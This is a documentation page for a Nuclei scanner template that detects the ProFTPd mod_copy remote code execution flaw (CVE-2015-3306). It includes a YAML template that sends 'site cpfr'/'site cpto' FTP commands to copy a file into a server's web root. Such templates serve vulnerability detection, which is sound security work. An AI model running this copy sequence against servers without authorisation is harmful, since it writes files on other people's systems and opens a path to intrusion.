Skip to content
Nuclei Templates

ProFTPd - Remote Code Execution

ID: CVE-2015-3306

Severity: critical

Author: pdteam

Tags: cve2015,cve,network,ftp,rce,proftpd,edb,tcp

Description

Section titled “Description”

ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.

YAML Source

Section titled “YAML Source”
id: CVE-2015-3306


info:
  name: ProFTPd - Remote Code Execution
  author: pdteam
  severity: critical
  description: ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code with the privileges of the ProFTPd process.
  remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later.
  reference:
    - https://github.com/t0kx/exploit-CVE-2015-3306
    - https://www.exploit-db.com/exploits/36803/
    - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html
    - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html
    - https://nvd.nist.gov/vuln/detail/CVE-2015-3306
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
    cvss-score: 10
    cve-id: CVE-2015-3306
    cwe-id: CWE-284
    epss-score: 0.97091
    epss-percentile: 0.99775
    cpe: cpe:2.3:a:proftpd:proftpd:1.3.5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: proftpd
    product: proftpd
    shodan-query: cpe:"cpe:2.3:a:proftpd:proftpd"
  tags: cve2015,cve,network,ftp,rce,proftpd,edb,tcp
tcp:
  - host:
      - "{{Hostname}}"
    port: 21
    inputs:
      - data: "site cpfr /proc/self/cmdline\r\n"
        read: 1024


      - data: "site cpto /tmp/.{{randstr}}\r\n"
        read: 1024


      - data: "site cpfr /tmp/.{{randstr}}\r\n"
        read: 1024


      - data: "site cpto /var/www/html/{{randstr}}\r\n"
    read-size: 1024
    matchers:
      - type: word
        part: raw
        words:
          - "Copy successful"
# digest: 4b0a00483046022100abb07228a2115bb0b5b901bdc95c0bb8615edd3c69ec94db4e0e1ad1874a7588022100b8882a5c2a34ec77da26dad442f33a2256c3dcbeacd96d83e801427520e74799:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "network/cves/2015/CVE-2015-3306.yaml"

View on Github